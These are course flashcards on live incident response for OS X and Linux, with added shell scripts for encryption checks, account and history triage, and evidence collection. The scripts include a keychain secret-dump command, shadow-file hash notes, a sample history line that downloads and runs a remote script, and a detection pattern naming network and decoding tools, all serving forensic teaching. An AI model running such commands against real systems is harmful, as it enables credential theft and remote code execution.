Week 6 - Live Incident Response OSX and Linux Flashcards
What are some OS X specific considerations?
OS X Specific Considerations:
OS X is Unix based and can be driven from the GUI or the command line
- sudo (and the user's password) is required to run many system commands
- However, many system properties can be read without entering a password
Virtualization is popular on OS X because so much software is Windows-only. There are plenty of tools for this that run well on OS X, e.g.
- Parallels
- VMware Fusion
- VirtualBox
- OS X also ships its own tool (Boot Camp) that installs another OS side by side. Always look for additional partitions carrying their own operating system, and for virtual machine disk files belonging to the tools above.
Although Whole Disk Encryption (WDE) is less widespread than on Windows, there are built-in and third-party tools that support it, such as:
- FileVault 2
- GPGDesktop
Support for encrypted file containers is also common:
- Encrypted disk images (.dmg) are built in
- VeraCrypt
What artifacts may be available in OS X? And what commands are used to extract them?
Artifacts in OS X - the same kinds of artifacts as on Windows, but they live in different locations and need different commands to extract them.
Saved Passwords (Keychain). This may not give us the password of the logged-in user, but it can give us many saved passwords from the applications in use.
- security dump-keychain -d ~/Library/Keychains/login.keychain (the file is named login.keychain-db on 10.12 and later). The -d flag dumps the secret data as well as the item metadata; the keychain must be unlocked and macOS asks for permission item by item, so run it as the logged-in user and expect the prompts.
Check for FileVault Whole Disk Encryption (WDE)
- diskutil list - look for "Unlocked Encrypted" (or "Locked Encrypted") beneath a CoreStorage logical volume
- diskutil cs list - shows CoreStorage information, including whether the logical volume is encrypted and currently unlocked
- On APFS systems (10.13 and later) CoreStorage is not used; check with fdesetup status or diskutil apfs list instead
Logs
- /Users/<user>/Library/Logs/
These logs record the activity, processes and events of applications running under that particular user account
- /Library/Logs/ (the main library)
A system-wide directory of log files written by applications and system processes that affect the whole system
- /var/log/ (system logs)
The key location for system and service logs (system.log, install.log, etc.), generally relating to system-level activity and processes. From 10.12 onwards most system logging goes to the unified log instead, which is queried with log show (e.g. log show --last 1h).
Bash history (the commands typed at a shell - particularly useful for malware activity or tech-savvy users)
- /Users/<user>/.bash_history
- The file is only written when the shell exits, so the current session's commands are still only in memory, and a user can suppress it (HISTFILE unset or pointed at /dev/null). zsh is the default shell from 10.15 onwards, so also check /Users/<user>/.zsh_history
/var/vm/sleepimage
- Related to hibernation (safe sleep): this file holds the contents of physical memory (RAM) written out when the system hibernates, so it can contain a memory image from the last hibernation. It is large and better suited to offline investigation.
/var/vm/swapfile#
- The swap files are part of virtual memory management: macOS creates them when physical RAM runs low and pages data out of RAM to disk to free space for other processes. Note that modern macOS encrypts swap by default, so these files are rarely readable in offline analysis.
What is FileVault 2?
The original FileVault only encrypted the user's home directory (as an encrypted disk image) and was cumbersome.
FileVault 2 (from OS X 10.7 Lion) is the equivalent of BitLocker on Windows: it encrypts the whole volume and relies on a separate unencrypted partition (the Recovery HD) to boot and unlock the encrypted volume. On older releases the encrypted volume is a CoreStorage logical volume; on APFS (10.13 and later) the encryption is native to the APFS container.
What are the two ways to look for FileVault disk encryption?
- diskutil list
Displays all disks and partitions currently connected to the system, internal and external, with the identifier, size, partition type and file system of each. A FileVault CoreStorage volume shows "Unlocked Encrypted" (or "Locked Encrypted") beneath the logical volume entry.
- diskutil cs list
Displays detailed information about CoreStorage volumes and their Logical Volume Groups (LVGs). CoreStorage was introduced by Apple as a volume manager, primarily for FileVault 2, so the listing gives an overview of the logical volumes and an Encryption Status line for each.
On APFS systems CoreStorage is not in use, so diskutil cs list prints nothing; use fdesetup status (which prints "FileVault is On." or "FileVault is Off.") or diskutil apfs list instead.
Encrypted Disk Images - What are .dmg containers?
A DMG (disk image) file on a Mac acts as a virtual disk or storage container. It is commonly used for distributing software, backing up data, or creating exact copies of physical disks. DMG files are mountable volumes: once opened in macOS they behave like an actual disk drive.
They are very common, and a lot of software is distributed this way. They can also be encrypted.
Disk images can be created easily from the command line (hdiutil create), and encrypting them is just as easy (hdiutil create -encryption AES-256 ...).
Once encrypted it is hard to tell from the file alone. One way is to open it and see whether a password is demanded; hdiutil isencrypted <file>.dmg reports the same thing without mounting the image.
Once disk images are mounted, check for mounted encrypted images with:
hdiutil info - for each mounted image, if the image-encrypted flag reads true the image is encrypted (the listing also gives the image path, the mounting user and the device node it was attached as).
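The two checks above (the FileVault indicator in diskutil list and the image-encrypted flag in hdiutil info) applied to command output, as an added example that is not part of the course notes. The diskutil, hdiutil and fdesetup text below is constructed to imitate the real output layout so the functions run offline; on a live Mac pipe the real command output in instead. The function names are this example's own.

```shell
#!/bin/sh
# Added example: pick the encryption indicators out of diskutil / hdiutil output.
# Samples below are constructed for the example (they copy the real layout).
# Live use:  diskutil list | filevault_volumes ;  hdiutil info | encrypted_images

# Constructed `diskutil list`: disk1 is a FileVault CoreStorage volume, unlocked
# because the user is logged in; disk2 is an unencrypted USB stick.
SAMPLE_DISKUTIL='/dev/disk0 (internal, physical):
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:      GUID_partition_scheme                        *251.0 GB   disk0
   1:                        EFI EFI                     209.7 MB   disk0s1
   2:          Apple_CoreStorage Macintosh HD            250.1 GB   disk0s2
   3:                 Apple_Boot Recovery HD             650.0 MB   disk0s3

/dev/disk1 (internal, virtual):
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:                  Apple_HFS Macintosh HD           +249.8 GB   disk1
                                 Logical Volume on disk0s2
                                 XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
                                 Unlocked Encrypted

/dev/disk2 (external, physical):
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:     FDisk_partition_scheme                        *16.0 GB    disk2
   1:                 DOS_FAT_32 USBSTICK                16.0 GB    disk2s1
'

# Constructed `hdiutil info`: two mounted images, only the first one encrypted.
SAMPLE_HDIUTIL='images          : 2
================================================
image-path      : /Users/analyst/Documents/notes.dmg
image-alias     : /Users/analyst/Documents/notes.dmg
shadow-path     : <none>
image-type      : read/write
system-image    : false
writeable       : TRUE
autodiskmount   : TRUE
removable       : TRUE
image-encrypted : true
mounting user   : analyst
process ID      : 4242
/dev/disk3        GUID_partition_scheme
/dev/disk3s1      Apple_HFS                 /Volumes/notes
================================================
image-path      : /Users/analyst/Downloads/Installer.dmg
image-alias     : /Users/analyst/Downloads/Installer.dmg
shadow-path     : <none>
image-type      : UDIF read-only compressed (zlib)
system-image    : false
writeable       : FALSE
autodiskmount   : TRUE
removable       : TRUE
image-encrypted : false
mounting user   : analyst
process ID      : 4251
/dev/disk4        Apple_HFS                 /Volumes/Installer
'

# Identifiers of volumes that diskutil marks as encrypted. Every numbered row
# names a volume; an "Unlocked Encrypted" / "Locked Encrypted" line that
# follows belongs to the most recent row, so remember its last column.
filevault_volumes() {
    awk '/^ *[0-9]+:/ { id = $NF }
         /(Unlocked|Locked) Encrypted/ { print id }'
}

# Paths of mounted images whose image-encrypted flag is true (case-insensitive,
# since the notes quote the flag as TRUE and hdiutil prints it lower-case).
encrypted_images() {
    awk '/^image-path/      { sub(/^image-path *: */, ""); path = $0 }
         /^image-encrypted/ { if (tolower($NF) == "true") print path }'
}

# APFS systems: diskutil cs list is empty, so read `fdesetup status` instead.
# Returns 0 (true) when FileVault is reported on.
filevault_on() {
    grep -q 'FileVault is On'
}

echo "FileVault volumes:";        printf '%s\n' "$SAMPLE_DISKUTIL" | filevault_volumes
echo "Encrypted mounted images:"; printf '%s\n' "$SAMPLE_HDIUTIL"  | encrypted_images
```

Because the functions read stdin, the same code works on saved output from a live response run (for example `filevault_volumes < evidence/diskutil_list.txt`), so the check can be repeated later from the evidence files rather than from the suspect machine.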
Example OS X Live Response Data Collection Methodology
Example OS X Live Response Data Collection Methodology (the same as for Windows - we are interested in the same artifacts and information regardless of OS)
- Run a trusted command shell from your toolkit
- Document the system date and time, and compare them to a reliable time source
- Acquire the contents of physical memory
- Gather hostname, user, and operating system details
- Gather system status and environment details
- Identify users logged onto the system
- Inspect network connections and open ports
- Examine DNS queries and connected hostnames
- Examine running processes
- Correlate open ports to the associated processes and programs
- Examine services and drivers
- Inspect open files
- Examine command-line history
- Identify connected shares
- Determine scheduled tasks
- Collect clipboard contents
- Determine the audit policy
*** As with Windows, this order is an example. In some cases there are good reasons to acquire physical memory at a later stage (for instance when no trusted memory acquisition tool exists for that OS version, or when volatile network state would otherwise be lost first). In the end you are the one who has to make that decision, so record why you made it.
List some live response tools for OS X - command-line tools.
Live Response Tools for OS X
The command line and scripting are powerful
- Use the 'script' command to log your actions (e.g. script evidence/session.log before you start)
Gather hostname, user, and operating system details
- Date = 'date'
- Hostname = 'hostname'
- Current user = 'whoami' (or 'id')
- OS details, short = 'sw_vers'
- OS details, comprehensive = 'system_profiler'
Identify users logged onto the system
- Logged-in users = 'w' (also 'who' and 'last')
Inspect network connections and open ports
- Network connections = 'netstat -an'; 'lsof -i -n -P' maps open ports to processes
Examine DNS queries
- 'dscacheutil' (dscacheutil -q host -a name <hostname> resolves through the Directory Services cache; a dump of the cache, dscacheutil -cachedump, is only available on older releases)
Examine running processes
- 'ps' / 'ps -u <username>' ('ps -ef' for everything)
Examine services and drivers
- Services = 'launchctl list'
- Loaded drivers (kernel extensions, or kexts, on OS X) = 'kextstat'
Inspect open files
- 'lsof'
Examine command-line history
- cat /Users/<user>/.bash_history (and .zsh_history on 10.15 and later)
Identify mapped drives and shares
- 'diskutil list', 'mount', and 'smbutil statshares -a' for connected SMB shares
Determine scheduled tasks
- 'launchctl list', plus the LaunchAgents and LaunchDaemons folders under /Library, /System/Library and ~/Library, and 'crontab -l' for each user
List some live response tools for OS X - toolkits.
OS X Incident Response Toolkits
- F-Response
- BlackLight
- MacForensicsLab
- The Sleuth Kit
Or build your own, since the command-line and scripting tools are powerful
What are some Linux Specific Considerations?
Linux Specific Considerations
Like OS X, Linux can be driven from the GUI or the command line
- sudo (and a password) is required to run many system commands
- it runs on almost anything (servers, routers, Android is Linux based, IoT devices, etc.)
- Very common in server environments
- Not as common for client workstations
Many different distributions or "flavors" of Linux
- so you may need to look in different places or use different commands depending on the distribution (and on whether it uses SysV init or systemd)
Support for encrypted file containers is common
- Native support for encrypted loopback devices (dm-crypt/LUKS)
- TrueCrypt / VeraCrypt also run on Linux
What artifacts might be relevant in Linux?
Artifacts in Linux:
Saved Passwords. Account information is kept in the password file and the password hashes in the shadow file (readable only by root). Extracting the hashes still leaves you cracking them offline to recover the actual passwords.
- /etc/passwd
- /etc/shadow
Encryption (very common on Linux)
- VeraCrypt
- BestCrypt
- Loopback devices / dm-crypt with LUKS (native to Linux; 'lsblk -f' shows crypto_LUKS for encrypted block devices, and /etc/crypttab lists volumes unlocked at boot)
You may find full disk encryption, encrypted containers, or encrypted user home directories (e.g. eCryptfs).
Logs
/var/log/ (usually, but it depends on the distribution; on systemd systems 'journalctl' reads the journal as well)
bash history
/home/<user>/.bash_history (and /root/.bash_history for root; only written when the shell exits)
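A first-pass triage of the three Linux artifacts above (passwd, shadow, bash history), as an added example that is not part of the course notes. The account records and the shell history are constructed samples embedded in the script so it runs offline; on a live host you would feed the real files to the same functions (reading /etc/shadow needs root). The function names and the history pattern list are this example's own choices.

```shell
#!/bin/sh
# Added example: triage of /etc/passwd, /etc/shadow and .bash_history content.
# All three inputs below are constructed sample data, not from a real system.

# Constructed passwd: svc-backup is a second UID 0 account, a classic backdoor.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
svc-backup:x:0:0:backup service:/var/backups:/bin/sh'

# Constructed shadow: placeholder hashes, two locked accounts, one with NO password.
SAMPLE_SHADOW='root:$6$salt$hashedvalue:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
www-data:*:19700:0:99999:7:::
alice:$6$salt$otherhash:19700:0:99999:7:::
svc-backup::19700:0:99999:7:::'

# Constructed history (203.0.113.0/24 is a documentation range).
SAMPLE_HISTORY='ls -la
cd /tmp
wget http://203.0.113.10/update.sh
chmod +x update.sh
./update.sh
crontab -e
unset HISTFILE
history -c'

# Accounts whose UID is 0: anything other than root is a finding.
uid0_accounts() { awk -F: '$3 == 0 { print $1 }'; }

# Accounts that can actually log in (shell is not a nologin/false stub).
login_accounts() { awk -F: '$7 !~ /(nologin|false)$/ { print $1 }'; }

# State of the password field per account: EMPTY (no password at all),
# LOCKED (field starts with ! or *) or HASH (something to crack offline).
shadow_state() {
    awk -F: '{
        if ($2 == "")          s = "EMPTY"
        else if ($2 ~ /^[!*]/) s = "LOCKED"
        else                   s = "HASH"
        print $1 ":" s
    }'
}

# History lines worth a second look, with line numbers. The pattern list is a
# starting point (download, make executable, persistence, history tampering),
# not a complete signature set; grep returning 1 on no match is not an error.
history_flags() {
    grep -n -E 'wget |curl |chmod \+x|unset HISTFILE|history -c|crontab|nc -l|base64 -d' || true
}

# Print the findings for one passwd/shadow/history triple.
triage_report() {   # triage_report <passwd-text> <shadow-text> <history-text>
    echo "== UID 0 accounts ==";              printf '%s\n' "$1" | uid0_accounts
    echo "== accounts with a login shell =="; printf '%s\n' "$1" | login_accounts
    echo "== password field state ==";        printf '%s\n' "$2" | shadow_state
    echo "== history lines to review ==";     printf '%s\n' "$3" | history_flags
}

triage_report "$SAMPLE_PASSWD" "$SAMPLE_SHADOW" "$SAMPLE_HISTORY"
```

On a real host the same report is `triage_report "$(cat /etc/passwd)" "$(sudo cat /etc/shadow)" "$(cat /home/alice/.bash_history)"`; an EMPTY password on a login-capable account, or a UID 0 account you did not create, goes straight to the findings list.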
Live Response Tools for Linux
Live Response Tools - Linux
Mostly the same as for macOS, with different commands where the operating systems differ
The command line and scripting are powerful
- Use the 'script' command to log your actions
Gather hostname, user, and operating system details
- Date = 'date'
- Hostname = 'hostname'
- Current user = 'whoami'
- OS details, short = 'cat /proc/version' (or 'uname -a'; the distribution is in /etc/os-release)
- CPU info = 'cat /proc/cpuinfo'
- 'uptime'
Identify users logged onto the system
- Logged-in users = 'w'
Inspect network connections and open ports
- Network connections = 'netstat -anp' or, on newer systems where netstat is absent, 'ss -tulpan'
Examine DNS queries
- Depends on the resolver in use (nscd, systemd-resolved, dnsmasq, a local BIND); often the only record is the resolver's own log, so check /var/log and 'journalctl -u systemd-resolved'
Examine running processes
- 'ps' / 'ps -u <username>' ('ps -ef' for everything)
Examine services and drivers
- Services = 'ls /etc/init.d/' (SysV init) or 'systemctl list-units --type=service' (systemd)
- Loaded drivers (kernel modules) = 'lsmod'
Inspect open files
- 'lsof'
Examine command-line history
- cat /home/<user>/.bash_history
Identify mapped drives and shares
- 'mount' (and 'df -h'; /etc/fstab lists persistent mounts, including network shares)
Linux Incident Response Toolkits
Linux Incident Response Toolkits
- Helix
- The Sleuth Kit
- Building your own command-line toolkit can be more flexible, as it can be tailored to specific needs
Scripting in Linux
Scripting - scripting is very powerful on Linux
Scripting in bash is a lot like writing a Windows batch script
- Comments, logic and variables are all available
Just type the commands as you would at the terminal
- mount > evidence/mounted_devices.txt (to redirect the output to a text file)
Start the script with the shell you want to use
- #!/<trusted>/sh - the default system shell
- #!/<trusted>/bash - the popular shell
(point the shebang at the copy of the shell in your trusted toolkit, not at the one on the suspect system)
Usually give it an .sh extension so it is recognised
Bash (short for Bourne Again SHell) is one of the most commonly used Unix shells and command-line interpreters, especially on Linux and macOS. It is not just an interface for running commands interactively; it is also a scripting language, so users can write and execute scripts (programs) to automate tasks on Linux and other Unix-like systems.
Bash scripts are widely used for system administration, automation and task management
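The command lists for OS X and Linux above, and the scripting advice in this section, combined into one collection script, as an added example that is not part of the course notes. It assumes it is started from a trusted toolkit directory (so PATH already resolves to trusted binaries), that the evidence directory is given as the first argument, and that the standard tool names apply; a missing tool or a failing command is recorded in the manifest rather than aborting the run. The function and artifact names are this example's own.

```shell
#!/bin/sh
# Added example: a minimal live-response collector for macOS and Linux.
# Assumes: trusted PATH, evidence directory as $1, standard tool names.
# Memory acquisition is left out because the tool is OS-version specific;
# take it before running this script if you can.

# collect <artifact-name> <command> [args...]
# Saves the command's output to <evidence>/<name>.txt and appends its exit
# status and the SHA-256 of the saved file to manifest.txt.
collect() {
    name=$1; shift
    out="$EVIDENCE/$name.txt"
    if ! command -v "$1" >/dev/null 2>&1; then
        printf '%s MISSING tool: %s\n' "$name" "$1" >>"$EVIDENCE/manifest.txt"
        return 0
    fi
    if "$@" >"$out" 2>&1; then rc=0; else rc=$?; fi
    printf '%s rc=%s\n' "$name" "$rc" >>"$EVIDENCE/manifest.txt"
    printf 'sha256 %s %s\n' "$(hash_file "$out")" "$name" >>"$EVIDENCE/manifest.txt"
}

# SHA-256 with whichever tool the platform has (sha256sum on Linux, shasum on
# macOS). Hashing at collection time lets you show later that the saved
# output was not altered.
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | awk '{print $1}'
    elif command -v shasum >/dev/null 2>&1;  then shasum -a 256 "$1" | awk '{print $1}'
    else echo unavailable
    fi
}

# Methodology order: time first, volatile state next, persistent config last.
collect_all() {
    EVIDENCE=$1
    mkdir -p "$EVIDENCE" || return 1
    : >"$EVIDENCE/manifest.txt"
    os=$(uname -s)
    collect date        date
    collect hostname    uname -n
    collect whoami      id
    collect uptime      uptime
    collect logged_in   w
    collect processes   ps -ef
    collect open_files  lsof -n
    collect mounts      mount
    collect history     cat "$HOME/.bash_history"
    if [ "$os" = Darwin ]; then
        collect os_version  sw_vers
        collect profile     system_profiler SPSoftwareDataType SPHardwareDataType
        collect netstat     netstat -an
        collect ports       lsof -i -n -P
        collect services    launchctl list
        collect kexts       kextstat
        collect disks       diskutil list
        collect filevault   fdesetup status
        collect images      hdiutil info
    else
        collect os_version  cat /proc/version
        collect cpuinfo     cat /proc/cpuinfo
        collect sockets     ss -tulpan
        collect netstat     netstat -anp
        collect modules     lsmod
        collect initd       ls -l /etc/init.d
        collect services    systemctl list-units --type=service --no-pager
        collect cron        ls -lR /etc/cron.d /var/spool/cron
        collect fstab       cat /etc/fstab
    fi
    printf 'collection finished in %s\n' "$EVIDENCE"
}

# Stand-alone use:  sh collect.sh /mnt/usb/evidence
if [ $# -gt 0 ]; then
    collect_all "$1"
fi
```

Start `script evidence/session.log` before running it so the terminal session is captured as well, and keep the evidence directory on removable media rather than on the suspect disk. The manifest gives you, per artifact, the exit status (a non-zero rc usually means the tool needed root) and a hash to quote in the report.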